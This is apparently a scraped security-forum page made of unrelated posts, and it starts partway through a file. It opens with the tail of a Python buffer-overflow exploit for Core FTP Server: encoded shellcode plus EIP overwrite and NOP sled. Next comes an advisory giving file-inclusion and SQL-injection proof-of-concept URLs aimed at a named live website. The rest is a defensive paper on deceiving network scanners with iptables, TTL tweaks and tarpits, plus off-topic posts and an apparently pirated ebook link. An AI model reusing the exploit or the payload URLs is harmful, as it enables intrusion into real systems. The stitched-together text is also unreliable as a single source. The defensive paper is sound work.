"\x31\x68\x53\x6e\x6b\x45\x54\x4c\x4b\x46\x61\x5a\x70\x6c" +
"\x49\x47\x34\x65\x74\x31\x34\x61\x4b\x31\x4b\x75\x31\x43" +
"\x69\x52\x7a\x36\x31\x6b\x4f\x59\x70\x73\x6f\x63\x6f\x32" +
"\x7a\x4c\x4b\x45\x42\x78\x6b\x6e\x6d\x43\x6d\x31\x7a\x63" +
"\x31\x6c\x4d\x6c\x45\x4e\x52\x75\x50\x77\x70\x47\x70\x50" +
"\x50\x63\x58\x66\x51\x4e\x6b\x62\x4f\x6b\x37\x6b\x4f\x7a" +
"\x75\x6f\x4b\x4c\x30\x68\x35\x6f\x52\x61\x46\x43\x58\x69" +
"\x36\x7a\x35\x4d\x6d\x4f\x6d\x69\x6f\x68\x55\x65\x6c\x56" +
"\x66\x33\x4c\x37\x7a\x4d\x50\x49\x6b\x79\x70\x51\x65\x37" +
"\x75\x4f\x4b\x31\x57\x75\x43\x61\x62\x70\x6f\x73\x5a\x73" +
"\x30\x46\x33\x39\x6f\x6a\x75\x70\x63\x45\x31\x42\x4c\x63" +
"\x53\x74\x6e\x71\x75\x31\x68\x73\x55\x57\x70\x41\x41"
)
payload = junk + EIP + nop + sehll
 
with open("CoreFTPServer_Ex.txt","wb") as f :
    f.write(payload)

 

https://www.exploit-db.com/exploits/39480/

[cumpar usd btc]

//solved

[ArpON Arp Handler Inspection 3.0]

ArpON (Arp handler inspectiON) is a portable ARP handler. It detects and blocks all ARP poisoning/spoofing attacks with the Static Arp Inspection (SARPI) and Dynamic Arp Inspection (DARPI) approaches on switched/hubbed LAN with/without DHCP protocol.

 

Changes: ArpON has been rewritten from scratch.

Download ArpON-3.0-ng.tar.gz (8.4 MB)

 

Source

[RW::Download 4.0.8 File Inclusion / SQL Injection]

RW::Download version 4.0.8 suffers from remote and local file inclusion and remote SQL injection vulnerabilities.

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
0     _                   __           __       __                     1  
1   /' \            __  /'__`\        /\ \__  /'__`\                   0 
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1  
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0  
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1  
1                  \ \____/ >> Exploit database separated by exploit   0  
0                   \/___/          type (local, remote, DoS, etc.)    1  
1                                                                      1 
0  [+] Site            : http://0day.today                             0 
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1  
0                                                                      0 
1                    ####################################              1 
0                  I'm indoushka member from Inj3ct0r Team             1 
1                    ####################################              0 
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
| # Title    : RWDownload v4.0.8 Multi Vulnerability
| # Author   : indoushka
| # email    : indoushka4ever@gmail.com
| # Tested on: windows 8.1 Français V.(Pro)
| # Vendor   : http://www.rwscripts.com/
========================================================================

Poc :

L/R file inclusion:

Line      : 134
Function  : require_once
variables : $langpref
Path      : C:\www\UPLOAD\index.php

http://3dcars.crystaldemon.com/index.php?langpref=her yours

SQl injection :

http://3dcars.crystaldemon.com/index.php?url=&cid= inject her
Greetz : 
jericho  http://attrition.org & http://www.osvdb.org/ * http://packetstormsecurity.com 
Hussin-X *D4NB4R* KnocKout * https://www.corelan.be
---------------------------------------------------------------------------------------

https://packetstormsecurity.com/files/135077/RW-Download-4.0.8-File-Inclusion-SQL-Injection.html

[Cumpar un sms Ungaria]

Individual number - From only $ 2.50 per month

World Numbers - Global Telephone Numbers Redirected Anywhere

[A fost cutremur?]

Nu.

AlbaNetInfo - Ultimele cutremure din România

[Bluffing Network Scan Tools]

Bluffing Network Scan Tools

What you see may not be what you get

Date of writing: 10/2015

Author: Emeric Nasi - emeric.nasi[at]sevagas.com

Website: Sevagas

License: This work is licensed under a Creative Commons Attribution 4.0 International License

Note: Pentesting / Network security basics are recommended to understand this paper.

1. Introduction

1.1. Relying on automatic tools

I have often seen tutorials or even pro pentesters relying too much, if not uniquely on automatic

scanning tools. It may be due to lack of knowledge, or more often due to lack of available time.

Obviously when you have 5 week days to complete a full corporate pentest, you can only do your best,

and it won't be perfect!

Anyway I just wanted to write a little something to remind that automatic tools results are always

interpretation of incoming data. Tools expect a certain behavior from systems, and will make some

assumptions. If you do not know this, you may be fooled by false positives or worse loose your valuable

time!

Just a quick example, when you successfully ping a machine, so you assume it's alive. But in fact, it just

means you received and ICMP Echo Reply packet in answer to sending an ICMP Echo Request. This echo

reply could have been send by another machine than the targeted one. It can be part of a tarpit strategy!

Now let's focus on some major features of security scan tools:

• OS fingerprinting
  
• Port Scanning
  
• Banner grabbing
  

1.2. Set up

I've ran my tests using two virtual machines running both on Linux. The targeted host is an Ubuntu 14.04

Linux with kernel 3.13.0 and has IP 192.168.0.16.

I targeted this host with free widely known scanning tools which are:

• Nmap (https://nmap.org/)
  
• OpenVas (OpenVAS - OpenVAS - Open Vulnerability Assessment System)
  
• Nikto (Nikto2 | CIRT.net)
  
• 
  

All the trick code in this article are summed up in a bash script in section §6 as an Annex at the end of the

document. You can copy past this code in a bash, run it as root, modify it and have fun!

2. OS Fingerprinting

2.1. Behind the scene

OS Fingerprinting, whether it is active (ex. using Nmap) or passive (ex. using p0f) relies on how the target

IP stack behaves in a way that distinguishes it from other systems.

Automatic tools will compare several behaviors and packets fields to a signature database. Automatic

tools will assume that IP stack behavior will always be the same for a given OS. This is indeed normally

the case, unless you modify it.

2.2. How it can be tricked

OS fingerprinting can be tricked by modifying the behavior of the system TCP/IP stack.

One of the values which are looked at by OS fingerprinting tools is an IP default Time To Leave (TTL) field

in the packet. It is also very easy to modify on a Linux Box. The default TTL value on Linux is generally set

to 64. As you can check by doing:

 # sysctl net.ipv4.ip_default_ttl
 net.ipv4.ip_default_ttl = 64

You can change this value to 128 which is, among others, Microsoft Windows default TTL value.

 # sysctl -w net.ipv4.ip_default_ttl=128

Let's see how Nmap and OpenVas react to this simple command.

Example 1: Nmap OS detection

The -O option is used by Nmap to fingerprint. The way Nmap fingerprints OS is fully explained at

https://nmap.org/book/man-os-detection.html

# nmap -O 192.168.0.16
Starting Nmap 6.00 ( http://nmap.org ) at 2015-09-27 18:13 CEST
Nmap scan report for 192.168.0.16
Host is up (0.00042s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
21/tcp filtered ftp
...
MAC Address: xxxxxxxxxxxxxxxxxxxxxx
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
...

Nmap builds signatures based on various behaviors it expects from the target IP stack.

In this case we can see we came up with something outside of Nmap signature base. However we just

change one value, the TTL. With more kernel tweaking, we could totally fake another OS signature on a

Linux Box

We can use the osscan-guess option to see what Nmap thinks our machine is most probably:

# nmap -O --osscan-guess 192.168.0.16
Starting Nmap 6.00 ( http://nmap.org ) at 2015-09-27 18:17 CEST
Nmap scan report for 192.168.0.16
Host is up (0.00042s latency)..
...
MAC Address: xxxxxxxxxxxxxxxxxxxxx
Device type: WAP|media device|general purpose|webcam|specialized|printer|PBX
Running (JUST GUESSING): Netgear embedded (92%), Western Digital embedded (92%), Linux
2.6.X|3.X|2.4.X (89%), AXIS Linux 2.6.X (88%), Crestron 2-Series (87%), Lexmark embedded (87%), Vodavi
embedded (86%), Comtrend embedded (86%)

Example 2: OpenVAS OS detection

The same test was done with OpenVas open source vulnerability scanner. The default scan does also run

OS fingerprinting mechanism, based on ICMP fingerprinting.

3. Port scanning

3.1. Behind the scene

Port scanning also relies on IP stack behavior, but this time on expected normal implementation of the

RFC (which is not always the case on all OS but let's not start on this topic!).

The most common scans used by tools are Syn scan and TCP connect scan. There are also other variant

of exotic scans playing with various possibilities of the TCP flag. Here is the normal behavior, expected

by port scan tools:

If the port is opened:

Scanner <---... SYN ...---> Target
Scanner <---... SYN,ACK ...---> Target

If the port is closed:

Scanner <---... SYN ...---> Target
Scanner <---... RST ...---> Target

For any other behavior, the port is considered filtered, behind a firewall.

Concerning other types of scans, you can find more information on this post I wrote a few years ago:

http://www.sevagas.com/?Iptables-firewall-versus-nmap-and,31'>http://www.sevagas.com/?Iptables-firewall-versus-nmap-and,31

3.2. How to detect it

Knowing how it works makes it possible to build a defense. In the code below we use iptables to log

various scan attempts, including exotic scans.

 iptables -A INPUT -p tcp --tcp-flags ALL FIN,PSH,URG -m limit --limit 6/h --limit-burst 1 -j LOG --log-prefix
"Firewall>XMAS scan "
 iptables -A INPUT -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -m limit --limit 6/h --limit-burst 1 -j LOG --
log-prefix "Firewall>XMAS-PSH scan "
 iptables -A INPUT -p tcp --tcp-flags ALL ALL -m limit --limit 6/h --limit-burst 1 -j LOG --log-prefix
"Firewall>XMAS-ALL scan "
iptables -A INPUT -p tcp --tcp-flags ALL FIN -m limit --limit 6/h --limit-burst 1 -j LOG --log-prefix
"Firewall>FIN scan "
 iptables -A INPUT -p tcp --tcp-flags SYN,RST SYN,RST -m limit --limit 6/h --limit-burst 1 -j LOG --logprefix
"Firewall>SYN/RST scan "
 iptables -A INPUT -p tcp --tcp-flags SYN,FIN SYN,FIN -m limit --limit 6/h --limit-burst 1 -j LOG --log-prefix
"Firewall>SYN/FIN scan "
 iptables -A INPUT -p tcp --tcp-flags ALL NONE -m limit --limit 6/h --limit-burst 1 -j LOG --log-prefix
"Firewall>Null scan "
# Prevent Syn port scan (will detect syn on 5 different port in less than 3 sec)
 iptables -A INPUT -m psd -p tcp -m limit --limit 6/h --limit-burst 1 -j LOG --log-prefix "Firewall>Syn scan
detected "

Note that the previous lines will only logs the scan, they will not prevent it. The goal is more to show that

by knowing the TCP flags used by ports scaners, we can detect them.

Concerning Syn and TCP connect scan, since they correspond to normal TCP connection behavior, they

are much more difficult to detect. One way, as seen above, is to use the iptables psd module which can

detect a certain amount of connection to different ports from the same IP in a given lapse of time.

This will not work is the scan is really slow. Another possibility is to ''trap'' some ports which are never

used on your systems. For example port 445 (SMB) on a Linux webserver or port 23 (Telnet) anywhere.

In these cases you are sure a hit on the port is a malicious activity. This is easy to do using iptables.

3.3. How to trick port scanning

An easy way to trick Syn and TCP connect port scanning is to pretend some or all ports are opened. This

can be done by responding Syn,Ack packet to any Syn query. This way, closed and filtered ports can be

thought opened.

We can do that using iptables TARPIT target:

iptables -A fw-aggressive -p tcp --destination-port 21 -j TARPIT
iptables -A fw-aggressive -p tcp --destination-port 137:139 -j TARPIT
iptables -A fw-aggressive -p tcp --destination-port 445 -j TARPIT

The TARPIT target will answer Syn/ACK packet to any Syn query on the filtered ports. This is useful to

trick automatic port scanner, especially those used by fast spreading worms and botnets.

Example 1: OpenVAS port scanning

As you can see, this default OpenVas scan assumes that our rogue ports are opened. It fell into the tarpit.

In reality, none of these ports are opened on the machine.

A well-crafted tarpit could lead vulnerability scanner to try to find vulnerabilities on the supposed

services and also return false positives. This is the case for example when you implement a Honeypot.

The Dionaea honeypot (http://dionaea.carnivore.it/) for example does a good job implementing false

insecure SMB services (however default banner grabbing will detect Dionaea as a service if it is not

modified).

This is a great way to loose a lot of time for the ''attacker''...

Example 2: Nmap port scanning

The iptables TARPIT does not work against latest versions of Nmap

# nmap 192.168.0.16
...
Not shown: 995 closed ports
PORT STATE SERVICE
21/tcp filtered ftp
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
...

We can see that despite the tarpit, Nmap detects that the ports are being filtered. On other versions,

Nmap will declare the ports as Open. In fact it is possible to detect the use of iptables TARPIT. This is

because the iptables TARPIT model returns a SYN/ACK packet which has singularities (for example, a max

sized segment of 0, which is not normally the case). This is well explained in this link

https://www.fishnetsecurity.com/6labs/blog/port-scanning-through-tarpits.'>https://www.fishnetsecurity.com/6labs/blog/port-scanning-through-tarpits. It is thus possible to detect

the usage of TARPIT iptables target for the scanner.

Anyway, even if Nmap can now bypass this simple use of TARPIT; It is possible to build a more

sophisticated one which returns a Syn/Ack packet in a much more realistic fashion.

4. Banner Grabbing

4.1. Behind the scene

Banner grabbing process is pretty simple, the scanner will act this time on application layer. It will send a

classic application request to the service, which will answer back. In the answer, the tools expect to find

the service name and version.

4.2. How to trick it

The most common methods used to trick both port scanning and banner grabbing is to use honeypots or

sophisticated tarpits applications.

If you want to test a quick demo, here is a nice little trick from Nick Marsh (see

http://marc.info/?l=nmap-dev&m=142811327627471&w=2) to send HTTP application scanner to an

infinite loophole.

Run the next command on the target machine

# ncat -lkv -p 8080 --sh-exec "echo 'HTTP/1.1 200 OK\r\n'; cat /dev/urandom"

Note: This is not something to run on production system, it may eat up your CPU after several scan

attempts!

Example 1: Using Nmap

A classic Nmap scan will just show the port is opened:

8080/tcp open http-proxy

However it is another story for Nmap script which attempts banner grabbing.

Nmap -sC or Nmap -A options will result in Nmap trying to pull an infinit HTTP message. This makes

Nmap run infinitely while consuming a lot of resources, and at one point, Nmap crashes.

Example 2: Using Nikto

nikto -host 192.168.0.16 -port 8080
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP: 192.168.0.16
+ Target Hostname: 192.168.0.16
+ Target Port: 8080
+ Start Time: 2015-09-28 09:34:03
---------------------------------------------------------------------------
+ Server: No banner retrieved

It is the same for Nikto. During the scan, while nothing happened, Nikto process was eating up all its host

CPU resource and I had to finally kill it.

5. To Conclude

With easy to implement examples, we can see that it is possible to trick security tools. When running

vulnerability scanners or any other kind of security tools, remember what is going on behind the scene.

Remember that the tools answers are ''assumptions'' and not definitive answers.

The Security tools can also be prone to vulnerabilities when running which can result in the scanner

being attacked by its target as we saw in the HTTP infinite tarpit case.

Warning: The methods in this article are all related to Security by Obscurity. It is generally recommended

to avoid Security by Obscurity but rather use standard and strong methodology. However for some

companies, Security By Obscurity is, when well used, only one of the security layers protecting the

system.

In my opinion Security by Obscurity should only be used:

- If your system already has really solid security ''by standards''

- If you are fully aware of the risks induced by your non-standards security method

- If both IT and Security team are aware of the implemented mechanism (or else you will ''obscure'' yourselfs..)

For me, experimenting on this topic is mainly about having some fun with my favorite Operating System!

Here are some interesting links if you want to go further:

http://www.sans.org/reading-room/whitepapers/tools/about-face-defending-organization-penetrationtesting-teams-33553

http://labrea.sourceforge.net/Intro-History.html

https://nmap.org/book/man-os-detection.html

https://www.fishnetsecurity.com/6labs/blog/port-scanning-through-tarpits

http://www.netfilter.org/projects/patch-o-matic/pom-external.html

http://www.sevagas.com/?Iptables-firewall-versus-nmap-and

6. ANNEX: Demo Bash Script

-------------------- Begin script ---------------------------

#!/bin/bash

# Emeric NASI - www.sevagas.com

# Some fun tweeking using linux kernel and firewall to trick security scanning tools

# Run as root

#

# Note: This is not a defensive firewall script, do not use as is to protect your network ports!

#

# Rules to pretend ports are opened

false_opened_ports()

{

iptables -N fw-aggressive # This chain is used to process IP where we apply aggressive defence

measures

iptables -A INPUT -m comment --comment "Pretend ports are opened" --jump fw-aggressive

iptables -A fw-aggressive -p tcp --destination-port 21 -j TARPIT

iptables -A fw-aggressive -p tcp --destination-port 137:139 -j TARPIT

iptables -A fw-aggressive -p tcp --destination-port 445 -j TARPIT

# If you have DROP default output policy remember to:

#iptables -A OUTPUT -p tcp --tcp-flags SYN,ACK SYN,ACK --source-port 21 -j ACCEPT

#iptables -A OUTPUT -p tcp --tcp-flags SYN,ACK SYN,ACK --source-port 137:139 -j ACCEPT

#iptables -A OUTPUT -p tcp --tcp-flags SYN,ACK SYN,ACK --source-port 445 -j ACCEPT

}

# Port scanning detection

detect_port_scan ()

{

# Drop and Log various port scannings types (Fin, Null, Xmas tree, etc.)"

iptables -A INPUT -p tcp --tcp-flags ALL FIN,PSH,URG -m limit --limit 6/h --limit-burst 1 -j LOG --logprefix

"Firewall>XMAS scan "

iptables -A INPUT -p tcp --tcp-flags ALL SYN,RST,ACK,FIN,URG -m limit --limit 6/h --limit-burst 1 -j LOG --

log-prefix "Firewall>XMAS-PSH scan "

iptables -A INPUT -p tcp --tcp-flags ALL ALL -m limit --limit 6/h --limit-burst 1 -j LOG --log-prefix

"Firewall>XMAS-ALL scan "

iptables -A INPUT -p tcp --tcp-flags ALL FIN -m limit --limit 6/h --limit-burst 1 -j LOG --log-prefix

"Firewall>FIN scan "

iptables -A INPUT -p tcp --tcp-flags SYN,RST SYN,RST -m limit --limit 6/h --limit-burst 1 -j LOG --logprefix

"Firewall>SYN/RST scan "

iptables -A INPUT -p tcp --tcp-flags SYN,FIN SYN,FIN -m limit --limit 6/h --limit-burst 1 -j LOG --log-prefix

"Firewall>SYN/FIN scan "

iptables -A INPUT -p tcp --tcp-flags ALL NONE -m limit --limit 6/h --limit-burst 1 -j LOG --log-prefix

"Firewall>Null scan "

# prevent Syn port scanning with psd extension

if ! locate libxt_psd.so &>/dev/null && [ $INTERNET ]

then

echo "WARNING: Iptables extension xtables-addons-common must be installed for optimal work."

fi

if locate libxt_psd.so &>/dev/null || [ -f /lib/xtables/libxt_psd.so ]

then

# Prevent Syn port scan (will detect syn on 5 different port in less than 3 sec)"

iptables -A INPUT -m psd -p tcp -m limit --limit 6/h --limit-burst 1 -j LOG --log-prefix "Firewall>Syn

scan detected "

fi

}

# Rules for local traffic

local_traffic ()

{

iptables -A INPUT -s 127.0.0.0/8 ! -i lo --jump DROP

iptables -A INPUT -s 127.0.0.1/32 --jump ACCEPT

iptables -A INPUT -i lo --jump ACCEPT

iptables -A OUTPUT -o lo --jump ACCEPT

}

# Reset and clean all firewall rules

cleanFirewall ()

{

# Clean all iptables rules

iptables -F

iptables -t nat -F

iptables -t mangle -Z

iptables -X

iptables -t nat -X

iptables -t mangle -X

# Restore default policies

iptables -P INPUT ACCEPT

iptables -P OUTPUT ACCEPT

iptables -P FORWARD ACCEPT

}

# Mask OS by changing IP stack behaviour

mask_os()

{

# Modify default TTL value

sysctl -w net.ipv4.ip_default_ttl=128 # Linux normal value is 64

}

# brings nmap -sC into infinit loop (because trying to get infinit header...)

# Also very harmful against other ex Nikto

# Method by Nick Marsh (see http://marc.info/?l=nmap-dev&m=142811327627471&w=2)

http_infinit_tarpit ()

{

ncat -lkv -p 8080 --sh-exec "echo 'HTTP/1.1 200 OK\r\n'; cat /dev/urandom" # Note: This is not

something to run on producton system, it may eat up your CPU!

}

# Main function

main()

{

cleanFirewall

mask_os

local_traffic

detect_port_scan

false_opened_ports

http_infinit_tarpit

}

main

-------------------- End of script ---------------------------

Source

[[eBook] Certified Information Systems Security Professional Official Study Guide]

Ai pus linkul de delete la download

Link: https://www.sendspace.com/file/funa4o

am editat, merci